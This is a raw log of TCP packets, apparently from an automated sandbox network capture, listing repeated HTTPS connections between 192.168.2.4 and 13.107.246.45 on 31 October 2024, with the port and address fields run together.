                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.272890091 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.272922993 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.272981882 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.273003101 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.273015976 CET51365443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.273022890 CET4435136513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.275329113 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.275362015 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.275480986 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.275672913 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.275687933 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.286148071 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.286214113 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.286302090 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.286524057 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.286549091 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.286597013 CET51363443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.286604881 CET4435136313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.289063931 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.289078951 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.289139986 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.289277077 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.289304018 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.376813889 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.377399921 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.377418995 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.378119946 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.378125906 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.427473068 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.471263885 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.488235950 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.488265038 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.488800049 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.488809109 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.507643938 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.508030891 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.508186102 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.508186102 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.508186102 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.512465954 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.512495995 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.512756109 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.512911081 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.512932062 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.815063953 CET51366443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.815097094 CET4435136613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.848035097 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.848128080 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.848205090 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.861530066 CET51367443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.861561060 CET4435136713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.871073961 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.871123075 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.871190071 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.872200012 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.872222900 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.989906073 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.990592957 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.990627050 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.991293907 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:24.991302013 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.001774073 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.002233028 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.002260923 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.002954006 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.002959967 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.019330978 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.065043926 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.107238054 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.107253075 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.108223915 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.108230114 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.123950005 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.124023914 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.124099970 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.124721050 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.124742031 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.124754906 CET51368443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.124759912 CET4435136813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.134861946 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.135099888 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.135147095 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.135181904 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.135221004 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.136116028 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.136125088 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.136158943 CET51369443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.136164904 CET4435136913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.174853086 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.174865007 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.175242901 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.186137915 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.186151028 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.197534084 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.197577000 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.197669983 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.201325893 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.201360941 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.247097969 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.247741938 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.247854948 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.250408888 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.271259069 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.271274090 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.271282911 CET51370443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.271287918 CET4435137013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.274178982 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.274198055 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.274815083 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.274820089 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.277149916 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.277169943 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.277784109 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.277992010 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.278019905 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.403522968 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.403600931 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.403660059 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.403938055 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.403958082 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.403985977 CET51371443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.403992891 CET4435137113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.407917023 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.407946110 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.408030033 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.408224106 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.408238888 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.631572962 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.632119894 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.632143021 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.632641077 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.632647991 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.821645021 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.821706057 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.822011948 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.822046995 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.822065115 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.822115898 CET51372443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.822122097 CET4435137213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.825265884 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.825305939 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.825377941 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.825537920 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.825551033 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.929368973 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.930773973 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.930792093 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.931298018 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.931303978 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.934830904 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.938728094 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.938751936 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.939120054 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:25.939125061 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.014349937 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.014870882 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.014883041 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.015597105 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.015603065 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.060954094 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.061064959 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.061273098 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.061304092 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.061316967 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.061328888 CET51374443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.061333895 CET4435137413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.064351082 CET51378443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.064378023 CET4435137813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.064455986 CET51378443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.064609051 CET51378443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.064624071 CET4435137813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067333937 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067364931 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067413092 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067475080 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067631960 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067641973 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067670107 CET51373443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.067676067 CET4435137313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.070406914 CET51379443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.070457935 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.070548058 CET51379443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.070719004 CET51379443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.070734978 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.146064997 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.146151066 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.146390915 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.146436930 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.146451950 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.146465063 CET51375443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.146470070 CET4435137513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.147969961 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.149496078 CET51380443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.149513006 CET4435138013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.149595022 CET51380443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.149728060 CET51380443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.149741888 CET4435138013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.149950981 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.149967909 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.150433064 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.150439024 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.278198957 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.278271914 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.278456926 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.278795958 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.278816938 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.278826952 CET51376443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.278832912 CET4435137613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.281769991 CET51381443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.281805992 CET4435138113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.281980991 CET51381443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.282264948 CET51381443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.282280922 CET4435138113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.566407919 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.570625067 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.570652008 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.571131945 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.571137905 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699279070 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699309111 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699361086 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699367046 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699429035 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699659109 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699678898 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699712038 CET51377443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.699718952 CET4435137713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.703075886 CET51382443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.703134060 CET4435138213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.703200102 CET51382443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.703351974 CET51382443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.703358889 CET4435138213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.788578033 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.789139032 CET51379443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.789164066 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.789669037 CET51379443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.789675951 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.806286097 CET4435137813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.810453892 CET51378443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.810483932 CET4435137813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.810899019 CET51378443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.810904980 CET4435137813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.877228022 CET4435138013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.879939079 CET51380443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.879957914 CET4435138013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.880558014 CET51380443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.880563974 CET4435138013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.919528008 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.919554949 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.919606924 CET4435137913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.919697046 CET51379443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:26.919858932 CET51379443192.168.2.413.107.246.45
